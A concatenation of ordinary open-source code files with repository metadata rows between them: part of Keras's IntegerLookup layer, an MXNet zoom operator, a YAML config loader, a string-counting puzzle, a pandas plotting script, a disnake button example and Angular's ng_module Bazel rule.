  array([[3, 5, 6],
         [2, 1, 4]])>

  Note that the output for OOV value 37 is 2, while the output for OOV value
  1000 is 1. The in-vocab terms have their output index increased by 1 from
  earlier examples (12 maps to 3, etc) in order to make space for the extra OOV
  value.

  **Multi-hot output**

  Configure the layer with `output_mode='binary'`. Note that the first
  `num_oov_indices` dimensions in the binary encoding represent OOV values

  >>> vocab = [12, 36, 1138, 42]
  >>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]])  # Note OOV values
  >>> layer = IntegerLookup(vocabulary=vocab, output_mode='binary')
  >>> layer(data)
  <tf.Tensor: shape=(2, 5), dtype=float32, numpy=
  array([[0., 1., 0., 1., 1.],
         [1., 0., 1., 0., 1.]], dtype=float32)>

  **Value count output**

  Configure the layer with `output_mode='count'`. As with binary output, the
  first `num_oov_indices` dimensions in the output represent OOV values.

  >>> vocab = [12, 36, 1138, 42]
  >>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]])  # Note OOV values
  >>> layer = IntegerLookup(vocabulary=vocab, output_mode='count')
  >>> layer(data)
  <tf.Tensor: shape=(2, 5), dtype=float32, numpy=
  array([[0., 1., 0., 1., 2.],
         [2., 0., 1., 0., 1.]], dtype=float32)>

  **TF-IDF output**

  Configure the layer with `output_mode='tf-idf'`. As with binary output, the
  first `num_oov_indices` dimensions in the output represent OOV values.

  Each value bin will output `value_count * idf_weight`, where the idf weights
  are the inverse document frequency weights per value. These should be
  provided along with the vocabulary. Note that the `idf_weight` for OOV
  values will default to the average of all idf weights passed in.

  >>> vocab = [12, 36, 1138, 42]
  >>> idf_weights = [0.25, 0.75, 0.6, 0.4]
  >>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]])  # Note OOV values
  >>> layer = IntegerLookup(output_mode='tf-idf')
  >>> layer.set_vocabulary(vocab, idf_weights=idf_weights)
  >>> layer(data)
  <tf.Tensor: shape=(2, 5), dtype=float32, numpy=
  array([[0.  , 0.25, 0.  , 0.6 , 0.8 ],
         [1.0 , 0.  , 0.75, 0.  , 0.4 ]], dtype=float32)>

  To specify the idf weights for oov values, you will need to pass the entire
  vocabularly including the leading oov value.

  >>> vocab = [-1, 12, 36, 1138, 42]
  >>> idf_weights = [0.9, 0.25, 0.75, 0.6, 0.4]
  >>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]])  # Note OOV values
  >>> layer = IntegerLookup(output_mode='tf-idf')
  >>> layer.set_vocabulary(vocab, idf_weights=idf_weights)
  >>> layer(data)
  <tf.Tensor: shape=(2, 5), dtype=float32, numpy=
  array([[0.  , 0.25, 0.  , 0.6 , 0.8 ],
         [1.8 , 0.  , 0.75, 0.  , 0.4 ]], dtype=float32)>

  When adapting the layer in tf-idf mode, each input sample will be considered
  a document, and idf weight per value will be calculated as
  `log(1 + num_documents / (1 + value_document_count))`.

  **Inverse lookup**

  This example demonstrates how to map indices to values using this layer. (You
  can also use adapt() with inverse=True, but for simplicity we'll pass the
  vocab in this example.)

  >>> vocab = [12, 36, 1138, 42]
  >>> data = tf.constant([[2, 4, 5], [5, 1, 3]])
  >>> layer = IntegerLookup(vocabulary=vocab, invert=True)
  >>> layer(data)
  <tf.Tensor: shape=(2, 3), dtype=int64, numpy=
  array([[  12, 1138,   42],
         [  42,   -1,   36]])>

  Note that the first two indices correspond to the mask and oov value by
  default. This behavior can be disabled by setting `mask_value=None` and
  `num_oov_indices=0`.

  **Forward and inverse lookup pairs**

  This example demonstrates how to use the vocabulary of a standard lookup
  layer to create an inverse lookup layer.

  >>> vocab = [12, 36, 1138, 42]
  >>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])
  >>> layer = IntegerLookup(vocabulary=vocab)
  >>> i_layer = IntegerLookup(vocabulary=layer.get_vocabulary(), invert=True)
  >>> int_data = layer(data)
  >>> i_layer(int_data)
  <tf.Tensor: shape=(2, 3), dtype=int64, numpy=
  array([[  12, 1138,   42],
         [  42,   -1,   36]])>

  In this example, the input value 1000 resulted in an output of -1, since
  1000 was not in the vocabulary - it got represented as an OOV, and all OOV
  values are returned as -1 in the inverse layer. Also, note that for the
  inverse to work, you must have already set the forward layer vocabulary
  either directly or via `fit()` before calling `get_vocabulary()`.
  """

  def __init__(self,
               max_values=None,
               num_oov_indices=1,
               mask_value=0,
               oov_value=-1,
               vocabulary=None,
               invert=False,
               output_mode=index_lookup.INT,
               sparse=False,
               pad_to_max_values=False,
               **kwargs):
    # This layer only operates on int64 values.
    allowed_dtypes = [dtypes.int64]

    if "dtype" in kwargs and kwargs["dtype"] not in allowed_dtypes:
      raise ValueError("The value of the dtype argument for IntegerLookup may "
                       "only be one of %s." % (allowed_dtypes,))

    if "dtype" not in kwargs:
      kwargs["dtype"] = dtypes.int64

    # If max_values is set, the value must be greater than 1 - otherwise we
    # are creating a 0-element vocab, which doesn't make sense.
    if max_values is not None and max_values <= 1:
      raise ValueError("If set, max_values must be greater than 1. "
                       "You passed %s" % (max_values,))

    if num_oov_indices < 0:
      raise ValueError(
          "num_oov_indices must be greater than or equal to 0. You passed %s" %
          (num_oov_indices,))

    if vocabulary is not None:
      if isinstance(vocabulary, str):
        vocabulary = table_utils.get_vocabulary_from_file(vocabulary)
      # Coerce all vocabulary entries (e.g. strings read from a file) to int.
      vocabulary = [int(v) for v in vocabulary]

    # The base IndexLookup layer uses "token" terminology; translate the
    # integer-flavored argument names before delegating.
    super(IntegerLookup, self).__init__(
        max_tokens=max_values,
        num_oov_indices=num_oov_indices,
        mask_token=mask_value,
        oov_token=oov_value,
        vocabulary=vocabulary,
        invert=invert,
        output_mode=output_mode,
        sparse=sparse,
        pad_to_max_tokens=pad_to_max_values,
        **kwargs)
    # Usage-tracking gauge for Keras preprocessing layers.
    base_preprocessing_layer.keras_kpl_gauge.get_cell("IntegerLookup").set(True)

  def get_config(self):
    base_config = super(IntegerLookup, self).get_config()
    # Because the super config has a bunch of args we're also passing,
    # we need to rename and remove them from the config dict.
    base_config["max_values"] = base_config["max_tokens"]
    del base_config["max_tokens"]

    base_config["mask_value"] = base_config["mask_token"]
    del base_config["mask_token"]

    base_config["oov_value"] = base_config["oov_token"]
    del base_config["oov_token"]

    base_config["pad_to_max_values"] = base_config["pad_to_max_tokens"]
    del base_config["pad_to_max_tokens"]
    return base_config

  def set_vocabulary(self, vocabulary, idf_weights=None):
    """Sets the vocabulary (and optional idf_weights) for this layer.

    `vocabulary` may be a list of integers or a path to a text file with one
    value per line; file-based vocabularies are not supported in TF-IDF mode.
    """
    if isinstance(vocabulary, str):
      if self.output_mode == index_lookup.TFIDF:
        raise RuntimeError("Setting vocabulary directly from a file is not "
                           "supported in TF-IDF mode, since this layer cannot "
                           "read files containing TF-IDF weight data. Please "
                           "read the file using Python and set the vocabulary "
                           "and weights by passing lists or arrays to the "
                           "set_vocabulary function's `vocabulary` and "
                           "`idf_weights` args.")
      vocabulary = table_utils.get_vocabulary_from_file(vocabulary)
      # File contents are strings; coerce to int before delegating.
      vocabulary = [int(v) for v in vocabulary]
    super().set_vocabulary(vocabulary, idf_weights=idf_weights)
| 43.300292 | 80 | 0.676811 |
482e2286ff62f2a03ba24bce4757bf8d0de1c4a4 | 6,123 | py | Python | deepim/operator_py/zoom_trans.py | THU-DA-6D-Pose-Group/mx-DeepIM | f1c850e5f8f75f1051a89c40daff9185870020f5 | [
"Apache-2.0"
] | 229 | 2018-09-08T08:38:59.000Z | 2022-03-29T07:09:22.000Z | deepim/operator_py/zoom_trans.py | greatwallet/mx-DeepIM | 74b6df2e3f6be7d6fed23ba2f553dab5ae950700 | [
"Apache-2.0"
] | 59 | 2018-09-13T20:10:36.000Z | 2021-01-08T12:22:27.000Z | deepim/operator_py/zoom_trans.py | greatwallet/mx-DeepIM | 74b6df2e3f6be7d6fed23ba2f553dab5ae950700 | [
"Apache-2.0"
] | 59 | 2018-09-08T07:56:33.000Z | 2022-03-25T22:01:42.000Z | # --------------------------------------------------------
# Deep Iterative Matching Network
# Licensed under The Apache-2.0 License [see LICENSE for details]
# Written by Yi Li, Gu Wang
# --------------------------------------------------------
from __future__ import print_function, division
import sys
import os
cur_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(cur_dir, "../../external/mxnet/mxnet_v00_origin"))
import mxnet as mx
import numpy as np
class ZoomTransOperator(mx.operator.CustomOp):
    """Rescales the x/y components of a translation delta by a per-sample zoom.

    When images are zoomed (cropped/resized) for iterative matching, in-plane
    translation deltas measured in one frame must be rescaled to the other.
    ``b_inv_zoom`` selects the direction (True: zoomed -> original frame,
    multiply by the factor; False: original -> zoomed frame, divide).
    ``b_zoom_grad`` selects whether the backward pass rescales gradients
    symmetrically or passes them through unchanged.  The z component is
    never scaled.
    """

    def __init__(self, b_inv_zoom, b_zoom_grad):
        super(ZoomTransOperator, self).__init__()
        self.b_inv_zoom = b_inv_zoom
        self.b_zoom_grad = b_zoom_grad

    def forward(self, is_train, req, in_data, out_data, aux):
        """in_data[0]: zoom factors (batch, 4); in_data[1]: deltas (batch, 3)."""
        ctx = in_data[0].context
        batch_size = in_data[0].shape[0]
        zoom_factor_array = in_data[0].asnumpy()
        trans_delta_array = in_data[1].asnumpy()
        zoom_trans_delta_array = np.zeros(trans_delta_array.shape)
        for batch_idx in range(batch_size):
            wx = zoom_factor_array[batch_idx][0]
            # BUGFIX: wy previously read column 0 as well, which made the
            # assert below vacuous.  The y scale lives in column 1 (the
            # __main__ self-test mirrors column 0 into column 1).
            wy = zoom_factor_array[batch_idx][1]
            assert wx == wy
            delta_x, delta_y, delta_z = trans_delta_array[batch_idx]
            if self.b_inv_zoom:
                # zoom backward
                zoom_delta_x = delta_x * wx
                zoom_delta_y = delta_y * wy
            else:
                # zoom in
                zoom_delta_x = delta_x / wx  # wx = crop / origin
                zoom_delta_y = delta_y / wy
            zoom_delta_z = delta_z  # depth is unaffected by in-plane zoom
            zoom_trans_delta_array[batch_idx, 0] = zoom_delta_x
            zoom_trans_delta_array[batch_idx, 1] = zoom_delta_y
            zoom_trans_delta_array[batch_idx, 2] = zoom_delta_z
        self.assign(out_data[0], req[0], mx.ndarray.array(zoom_trans_delta_array, ctx=ctx))

    def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
        """Propagates gradients to the delta input; zoom factors get none."""
        ctx = in_data[0].context
        batch_size = in_data[0].shape[0]
        zoom_factor_array = in_data[0].asnumpy()
        zoom_trans_grad_array = out_grad[0].asnumpy()
        trans_grad_array = np.zeros(zoom_trans_grad_array.shape)
        for batch_idx in range(batch_size):
            wx = zoom_factor_array[batch_idx][0]
            # BUGFIX: same column-0 copy/paste as in forward(); y scale is
            # column 1.
            wy = zoom_factor_array[batch_idx][1]
            assert wx == wy
            zoom_grad_x, zoom_grad_y, zoom_grad_z = zoom_trans_grad_array[batch_idx]
            if self.b_zoom_grad:
                # Mirror the forward scaling on the gradient.
                if self.b_inv_zoom:
                    grad_x = zoom_grad_x * wx
                    grad_y = zoom_grad_y * wy
                else:
                    grad_x = zoom_grad_x / wx
                    grad_y = zoom_grad_y / wy
            else:
                grad_x = zoom_grad_x
                grad_y = zoom_grad_y
            grad_z = zoom_grad_z
            trans_grad_array[batch_idx, 0] = grad_x
            trans_grad_array[batch_idx, 1] = grad_y
            trans_grad_array[batch_idx, 2] = grad_z
        # Zoom factors are treated as constants: zero gradient.
        self.assign(in_grad[0], req[0], 0)
        self.assign(in_grad[1], req[1], mx.ndarray.array(trans_grad_array, ctx=ctx))
@mx.operator.register("ZoomTrans")
class ZoomTransProp(mx.operator.CustomOpProp):
    """Symbol-level registration/metadata for the ZoomTrans custom operator."""

    def __init__(self, b_inv_zoom="False", b_zoom_grad="False"):
        super(ZoomTransProp, self).__init__(True)
        # MXNet passes custom-op kwargs as strings; parse the boolean flags.
        self.b_inv_zoom = b_inv_zoom.lower() == "true"
        self.b_zoom_grad = b_zoom_grad.lower() == "true"

    def list_arguments(self):
        return ["zoom_factor", "trans_delta"]

    def list_outputs(self):
        return ["zoom_trans_delta"]

    def infer_shape(self, in_shape):
        # Output shape mirrors the translation-delta input.
        return in_shape, [in_shape[1]], []

    def infer_type(self, in_type):
        dtype = in_type[0]
        return [dtype, dtype], [dtype], []

    def create_operator(self, ctx, shapes, dtypes):
        return ZoomTransOperator(self.b_inv_zoom, self.b_zoom_grad)
if __name__ == "__main__":
    # Manual smoke test: runs the operator forward in both directions on a
    # GPU and checks that zoom followed by inverse zoom recovers the input.
    # configs
    thresh = 1e-3  # NOTE(review): unused — presumably intended for a numeric-diff check
    step = 1e-4  # NOTE(review): unused — presumably a finite-difference step size
    ctx = mx.gpu(0)
    batch_size = 8
    # initialize layer
    zoom_factor = mx.sym.Variable("zoom_factor")
    trans_delta = mx.sym.Variable("trans_delta")
    se3_trans = mx.sym.Variable("se3_trans")  # NOTE(review): unused symbol
    proj2d = mx.sym.Custom(
        zoom_factor=zoom_factor, trans_delta=trans_delta, name="updater", op_type="ZoomTrans", b_inv_zoom=False
    )
    v_zoom_factor = np.random.rand(batch_size, 4) * 2
    # Mirror column 0 into column 1 so the operator's wx == wy assert holds.
    v_zoom_factor[:, 1] = v_zoom_factor[:, 0]
    v_trans_delta = np.random.rand(batch_size, 3) * 2
    exe1 = proj2d.simple_bind(ctx=ctx, zoom_factor=v_zoom_factor.shape, trans_delta=v_trans_delta.shape)
    # forward
    exe1.arg_dict["zoom_factor"][:] = mx.ndarray.array(v_zoom_factor, ctx=ctx)
    exe1.arg_dict["trans_delta"][:] = mx.ndarray.array(v_trans_delta, ctx=ctx)
    import time
    import matplotlib.pyplot as plt  # noqa:F401
    t = time.time()  # NOTE(review): timing value is never read
    exe1.forward(is_train=True)
    zoom_trans_delta_mx = exe1.outputs[0].asnumpy()
    # Reference computation in plain numpy: zoom-in divides x/y by the factor.
    zoom_trans_delta_py = np.copy(v_trans_delta)
    for batch_idx in range(batch_size):
        zoom_trans_delta_py[batch_idx, :2] /= v_zoom_factor[batch_idx, 0]
        print("py: ", zoom_trans_delta_py[batch_idx])
        print("mx: ", zoom_trans_delta_mx[batch_idx])
    print(zoom_trans_delta_py - zoom_trans_delta_mx)
    # Second pass: inverse zoom should map the zoomed deltas back to the input.
    proj2d = mx.sym.Custom(
        zoom_factor=zoom_factor, trans_delta=trans_delta, name="updater", op_type="ZoomTrans", b_inv_zoom=True
    )
    exe2 = proj2d.simple_bind(ctx=ctx, zoom_factor=v_zoom_factor.shape, trans_delta=v_trans_delta.shape)
    exe2.arg_dict["zoom_factor"][:] = mx.ndarray.array(v_zoom_factor, ctx=ctx)
    exe2.arg_dict["trans_delta"][:] = mx.ndarray.array(zoom_trans_delta_mx, ctx=ctx)
    exe2.forward(is_train=True)
    trans_delta_mx = exe2.outputs[0].asnumpy()
    for batch_idx in range(batch_size):
        print("py: ", v_trans_delta[batch_idx])
        print("mx: ", trans_delta_mx[batch_idx])
    # Round-trip error; should be ~0 up to float precision.
    print("trans_delta_mx-v_trans_delta:\n", trans_delta_mx - v_trans_delta)
08bd33517fad6e96e808dc841de7ed5dbafaa98c | 935 | py | Python | utils/load_config.py | jamaalhay/Final_Proj | 3f524a90fee5a3cb21466ab76f630d060792045d | [
"MIT"
] | 104 | 2018-05-16T07:15:29.000Z | 2022-03-08T09:28:02.000Z | utils/load_config.py | jamaalhay/Final_Proj | 3f524a90fee5a3cb21466ab76f630d060792045d | [
"MIT"
] | 4 | 2018-08-02T17:13:31.000Z | 2020-09-16T05:01:09.000Z | utils/load_config.py | jamaalhay/Final_Proj | 3f524a90fee5a3cb21466ab76f630d060792045d | [
"MIT"
] | 22 | 2018-05-30T10:13:49.000Z | 2021-12-14T15:43:12.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'han'
import sys
import yaml
import logging.config
def init_logging(config_path='config/logging_config.yaml'):
    """Initialize the logging module from a YAML dictConfig file.

    Falls back to ``logging.basicConfig(level=DEBUG)`` when the config file
    cannot be opened.

    :param config_path: path to the YAML logging configuration file
    :return: None
    """
    try:
        with open(config_path, 'r') as f:
            # safe_load: only builds plain Python objects, and avoids the
            # PyYAML "load() without Loader" deprecation warning.
            config = yaml.safe_load(f)
        logging.config.dictConfig(config)
    except IOError:
        sys.stderr.write('logging config file "%s" not found' % config_path)
        logging.basicConfig(level=logging.DEBUG)
def read_config(config_path='config/global_config.yaml'):
    """Load and return the project-wide configuration.

    Exits the process with status -1 if the file cannot be opened.

    :param config_path: path to the YAML global configuration file
    :return: the parsed configuration (typically a dict)
    """
    try:
        with open(config_path, 'r') as f:
            # safe_load: untrusted-input-safe and not deprecated (plain
            # yaml.load without a Loader is both).
            config = yaml.safe_load(f)
        return config
    except IOError:
        # Fixed message: this is the *global* config, not the logging config.
        sys.stderr.write('global config file "%s" not found' % config_path)
        # sys.exit instead of the site-provided exit(): works under
        # `python -S` and in frozen interpreters.
        sys.exit(-1)
| 23.375 | 76 | 0.623529 |
9683bcdd18f7a7de84aa880aece554b9423aab8f | 1,268 | py | Python | examples/cog.py | LOCUS-TEAM/py-cord-components | 117302809482dfdcdfec0cfd9a7fa4fb1eb45671 | [
"MIT"
] | 1 | 2022-03-16T12:13:32.000Z | 2022-03-16T12:13:32.000Z | examples/cog.py | LOCUS-TEAM/py-cord-components | 117302809482dfdcdfec0cfd9a7fa4fb1eb45671 | [
"MIT"
] | null | null | null | examples/cog.py | LOCUS-TEAM/py-cord-components | 117302809482dfdcdfec0cfd9a7fa4fb1eb45671 | [
"MIT"
] | null | null | null | from disnake.ext.commands import command, Cog
from disnake_components import (
Button,
ButtonStyle,
Select,
SelectOption,
)
class ExampleCog(Cog):
    """Example cog demonstrating component callbacks registered through the
    bot's components manager."""
    def __init__(self, bot):
        self.bot = bot
    @command()
    async def button(self, ctx):
        async def on_click(interaction):
            await interaction.send(content="Yay")
        # Register the callback with the manager, then attach the wrapped
        # button to the outgoing message.
        blue_button = Button(style=ButtonStyle.blue, label="Click this")
        wrapped = self.bot.components_manager.add_callback(blue_button, on_click)
        await ctx.send(
            "Button callbacks!",
            components=[wrapped],
        )
    @command()
    async def select(self, ctx):
        async def on_select(interaction):
            await interaction.send(content="Yay")
        menu = Select(
            options=[
                SelectOption(label="a", value="a"),
                SelectOption(label="b", value="b"),
            ],
        )
        wrapped = self.bot.components_manager.add_callback(menu, on_select)
        await ctx.send(
            "Select callbacks!",
            components=[wrapped],
        )
# Standard extension entry point: called by bot.load_extension() to
# register this cog on the bot.
def setup(bot):
    bot.add_cog(ExampleCog(bot))
| 24.862745 | 80 | 0.485804 |
8100f93e153abc9e46fc81ca35e2763c39e23790 | 1,063 | py | Python | Initial-codes.py | White-Brett/Nutrients-Prediction | bb2c3bfe3718b41fa8e31bcb19ce50c00aa85b66 | [
"CC0-1.0"
] | null | null | null | Initial-codes.py | White-Brett/Nutrients-Prediction | bb2c3bfe3718b41fa8e31bcb19ce50c00aa85b66 | [
"CC0-1.0"
] | null | null | null | Initial-codes.py | White-Brett/Nutrients-Prediction | bb2c3bfe3718b41fa8e31bcb19ce50c00aa85b66 | [
"CC0-1.0"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
t_1= pd.read_excel("C:/Users/BrettData/Desktop/capst/fertilzer-use.xlsx", sheet_name=0, header=3, names=None, index_col=None, keep_default_na=False)
t1=t_1.iloc[7:59,1:5]
t1.plot()
plt.show()
t1.plot(kind='area')
plt.show()
t_2= pd.read_excel("C:/Users/BrettData/Desktop/capst/fertilizer-use.xlsx", sheet_name=1, header=3, names=None, index_col=None, keep_default_na=False)
t2=t_2.iloc[7:59,1:5]
t2.plot()
plt.show()
t2.plot(kind='area')
plt.show()
t_3=pd.read_excel("C:/Users/BrettData/Desktop/capst/fertiliser-use.xlsx", sheet_name=2, header=2, names=None, idex_col=None, keep_default_na=False)
tt3=t_3.iloc[7:59,1:9]
t3=tt3.drop(columns='Unnamed: 3')
t3.plot()
plt.show()
t3.plot(kind='area')
plt.show()
t_4=pd.read_excel("C:/Users/BrettData/Desktop/capst/fertiliser-use.xlsx", sheet_name=3, header=2, names=None, idex_col=None, keep_default_na=False)
tt4=t_4.iloc[7:35,1:9]
t4=tt4.drop(columns='Unnamed: 5')
t4.plot()
plt.show()
t4.plot(kind='area')
plt.show() | 36.655172 | 150 | 0.727187 |
fb16e53598ef76514035e6b8a297acc9237b56f9 | 840 | py | Python | horse_neigh_problem.py | lzmaths/leetcode | 0e457b74dcb07050a4612c1c209785829bde5898 | [
"MIT"
] | null | null | null | horse_neigh_problem.py | lzmaths/leetcode | 0e457b74dcb07050a4612c1c209785829bde5898 | [
"MIT"
] | null | null | null | horse_neigh_problem.py | lzmaths/leetcode | 0e457b74dcb07050a4612c1c209785829bde5898 | [
"MIT"
] | null | null | null | import sys
class Horse(object):
    """
    Count complete interleaved occurrences of "neigh" in a string.

    Returns the number of simultaneously-neighing horses needed, or -1
    when the letters cannot form valid interleaved "neigh" sequences.
    """
    def countHorse(self, s):
        word = "neigh"
        position = {letter: j for j, letter in enumerate(word)}
        # counts[j]: how many in-progress "neigh"s have reached letter j.
        counts = [0] * len(word)
        answer = 0
        for ch in s:
            j = position[ch]
            counts[j] += 1
            if j == 0:
                # A new horse starts; track the peak number in flight.
                answer = max(answer, counts[0])
            else:
                # Each letter must be preceded by at least as many of the
                # previous letter, otherwise the interleaving is invalid.
                if counts[j - 1] < counts[j]:
                    return -1
                if ch == 'h':
                    # One horse finished: retire one copy of every letter.
                    counts = [c - 1 for c in counts]
        # Any leftover partial word means the string was invalid.
        return -1 if max(counts) != 0 else answer
# Quick smoke tests (printed to stdout): two invalid interleavings and one
# valid string that needs two concurrent horses.
horse = Horse()
print(horse.countHorse("neineighghneigh")) # expect 2
print(horse.countHorse("neineighghneighn")) # expect -1
print(horse.countHorse("neineighghnigh")) # expect -1
| 31.111111 | 76 | 0.511905 |
36006c2b5d67581caf4e93b2f32f71ec829bf547 | 31,053 | bzl | Python | packages/bazel/src/ng_module.bzl | Flusinerd/angular | 91934ebb5c7633e90b8f9ba8f958b4158259a87b | [
"MIT"
] | 1 | 2020-01-31T01:23:12.000Z | 2020-01-31T01:23:12.000Z | packages/bazel/src/ng_module.bzl | Flusinerd/angular | 91934ebb5c7633e90b8f9ba8f958b4158259a87b | [
"MIT"
] | null | null | null | packages/bazel/src/ng_module.bzl | Flusinerd/angular | 91934ebb5c7633e90b8f9ba8f958b4158259a87b | [
"MIT"
] | null | null | null | # Copyright Google Inc. All Rights Reserved.
#
# Use of this source code is governed by an MIT-style license that can be
# found in the LICENSE file at https://angular.io/license
"""Run Angular's AOT template compiler
"""
load(
":external.bzl",
"COMMON_ATTRIBUTES",
"COMMON_OUTPUTS",
"DEFAULT_API_EXTRACTOR",
"DEFAULT_NG_COMPILER",
"DEFAULT_NG_XI18N",
"DEPS_ASPECTS",
"NpmPackageInfo",
"TsConfigInfo",
"compile_ts",
"js_ecma_script_module_info",
"js_named_module_info",
"node_modules_aspect",
"ts_providers_dict_to_struct",
"tsc_wrapped_tsconfig",
)
_FLAT_DTS_FILE_SUFFIX = ".bundle.d.ts"
_R3_SYMBOLS_DTS_FILE = "src/r3_symbols.d.ts"
def is_ivy_enabled(ctx):
    """Determine if the ivy compiler should be used by the ng_module.
    Args:
      ctx: skylark rule execution context
    Returns:
      Boolean, Whether the ivy compiler should be used.
    """
    # TODO(josephperott): Remove after ~Feb 2020, to allow local script migrations
    if "compile" in ctx.var and ctx.workspace_name == "angular":
        fail(
            msg = "Setting ViewEngine/Ivy using --define=compile is deprecated, please use " +
                  "--config=ivy or --config=view-engine instead.",
            attr = "ng_module",
        )
    # This attribute is only defined in google's private ng_module rule and not
    # available externally. For external users, this is effectively a no-op.
    if hasattr(ctx.attr, "ivy") and ctx.attr.ivy == True:
        return True
    # Set by --config=ivy (--define=angular_ivy_enabled=True).
    if ctx.var.get("angular_ivy_enabled", None) == "True":
        return True
    # Enable Angular targets extracted by Kythe Angular indexer to be compiled with the Ivy compiler architecture.
    # TODO(ayazhafiz): remove once Ivy has landed as the default in g3.
    if ctx.var.get("GROK_ELLIPSIS_BUILD", None) != None:
        return True
    # Return false to default to ViewEngine compiler
    return False
def _compiler_name(ctx):
    """Selects a user-visible name depending on the current compilation strategy.
    Args:
      ctx: skylark rule execution context
    Returns:
      The name of the current compiler to be displayed in build output
    """
    if is_ivy_enabled(ctx):
        return "Ivy"
    return "ViewEngine"
def _is_view_engine_enabled(ctx):
    """Determines whether Angular outputs will be produced by the current compilation strategy.
    Args:
      ctx: skylark rule execution context
    Returns:
      true iff the current compilation strategy will produce View Engine compilation outputs (such as
      factory files), false otherwise
    """
    # View Engine and Ivy are mutually exclusive compilation strategies.
    if is_ivy_enabled(ctx):
        return False
    return True
def _basename_of(ctx, file):
    """Returns file's path relative to the package, stripped of its source/template extension."""
    path = file.short_path
    # Strip the longest matching known extension (.ng.html before .html).
    if path.endswith(".ng.html"):
        suffix_len = len(".ng.html")
    elif path.endswith(".html"):
        suffix_len = len(".html")
    else:
        suffix_len = len(".ts")
    return path[len(ctx.label.package) + 1:-suffix_len]
# Return true if run with bazel (the open-sourced version of blaze), false if
# run with blaze.
def _is_bazel():
    # Blaze (google-internal) exposes native.genmpm; open-source Bazel does not.
    return not hasattr(native, "genmpm")
def _flat_module_out_file(ctx):
    """Provide a default for the flat_module_out_file attribute.
    We cannot use the default="" parameter of ctx.attr because the value is calculated
    from other attributes (name)
    Args:
      ctx: skylark rule execution context
    Returns:
      a basename used for the flat module out (no extension)
    """
    explicit = getattr(ctx.attr, "flat_module_out_file", False)
    if explicit:
        return explicit
    # Fall back to a name derived from the target, to avoid colliding with inputs.
    return "%s_public_index" % ctx.label.name
def _should_produce_dts_bundle(ctx):
    """Whether flattened dts bundles should be produced for this target.
    Bundled d.ts outputs are only emitted for targets that are meant to be
    published, as signalled by the bundle_dts attribute.
    Args:
      ctx: skylark rule execution context
    Returns:
      true when we should produce bundled dts.
    """
    # ngtsc emits `import * as ___` from local modules, which the dts bundler
    # cannot process, so dts bundling stays ViewEngine-only for now.
    # see: https://github.com/Microsoft/web-build-tools/issues/1029
    if not _is_view_engine_enabled(ctx):
        return False
    return getattr(ctx.attr, "bundle_dts", False)
def _should_produce_r3_symbols_bundle(ctx):
    """Should we produce r3_symbols bundle.
    NGCC relies on having r3_symbols file. This file is located in @angular/core
    And should only be included when bundling core in legacy mode.
    Args:
      ctx: skylark rule execution context
    Returns:
      true when we should produce r3_symbols dts.
    """
    # iff we are compiling @angular/core with ngc we should add this additional dts bundle
    # because ngcc relies on having this file.
    # see: https://github.com/angular/angular/blob/84406e4d6d93b28b23efbb1701bc5ae1084da67b/packages/compiler-cli/src/ngcc/src/packages/entry_point_bundle.ts#L56
    # todo: alan-agius4: remove when ngcc doesn't need this anymore
    return _is_view_engine_enabled(ctx) and ctx.attr.module_name == "@angular/core"
def _should_produce_flat_module_outs(ctx):
    """Should we produce flat module outputs.
    We only produce flat module outs when we expect the ng_module is meant to be published,
    based on the presence of the module_name attribute.
    Args:
      ctx: skylark rule execution context
    Returns:
      true iff we should run the bundle_index_host to produce flat module metadata and bundle index
    """
    # Flat module outputs are a Bazel-only feature; module_name marks publishable targets.
    return _is_bazel() and ctx.attr.module_name
# Calculate the expected output of the template compiler for every source in
# in the library. Most of these will be produced as empty files but it is
# unknown, without parsing, which will be empty.
def _expected_outs(ctx):
    """Declares every output file the compiler may produce for this target.

    Returns a struct of lists of declared Files, grouped by output flavor
    (prodmode/devmode JS, declarations, summaries, metadata, dts bundles,
    bundle index typings, i18n messages).
    """
    is_legacy_ngc = _is_view_engine_enabled(ctx)
    devmode_js_files = []
    closure_js_files = []
    declaration_files = []
    summary_files = []
    metadata_files = []
    factory_basename_set = depset([_basename_of(ctx, src) for src in ctx.files.factories])
    for src in ctx.files.srcs + ctx.files.assets:
        package_prefix = ctx.label.package + "/" if ctx.label.package else ""
        # Strip external repository name from path if src is from external repository
        # If src is from external repository, it's short_path will be ../<external_repo_name>/...
        short_path = src.short_path if src.short_path[0:2] != ".." else "/".join(src.short_path.split("/")[2:])
        if short_path.endswith(".ts") and not short_path.endswith(".d.ts"):
            basename = short_path[len(package_prefix):-len(".ts")]
            # An empty factories attribute means every .ts source gets shims.
            if (len(factory_basename_set.to_list()) == 0 or basename in factory_basename_set.to_list()):
                if _generate_ve_shims(ctx):
                    devmode_js = [
                        ".ngfactory.js",
                        ".ngsummary.js",
                        ".js",
                    ]
                else:
                    devmode_js = [".js"]
                # Only ngc produces .json files, they're not needed in Ivy.
                if is_legacy_ngc:
                    summaries = [".ngsummary.json"]
                    metadata = [".metadata.json"]
                else:
                    summaries = []
                    metadata = []
            else:
                devmode_js = [".js"]
                if not _is_bazel():
                    devmode_js += [".ngfactory.js"]
                summaries = []
                metadata = []
        elif is_legacy_ngc and short_path.endswith(".css"):
            basename = short_path[len(package_prefix):-len(".css")]
            devmode_js = [
                ".css.shim.ngstyle.js",
                ".css.ngstyle.js",
            ]
            summaries = []
            metadata = []
        else:
            # Asset types other than .ts/.css produce no compiler outputs.
            continue
        filter_summaries = ctx.attr.filter_summaries
        # Prodmode outputs use the .mjs extension (ES modules).
        closure_js = [f.replace(".js", ".mjs") for f in devmode_js if not filter_summaries or not f.endswith(".ngsummary.js")]
        declarations = [f.replace(".js", ".d.ts") for f in devmode_js]
        devmode_js_files += [ctx.actions.declare_file(basename + ext) for ext in devmode_js]
        closure_js_files += [ctx.actions.declare_file(basename + ext) for ext in closure_js]
        declaration_files += [ctx.actions.declare_file(basename + ext) for ext in declarations]
        summary_files += [ctx.actions.declare_file(basename + ext) for ext in summaries]
        if not _is_bazel():
            metadata_files += [ctx.actions.declare_file(basename + ext) for ext in metadata]
    dts_bundles = None
    if _should_produce_dts_bundle(ctx):
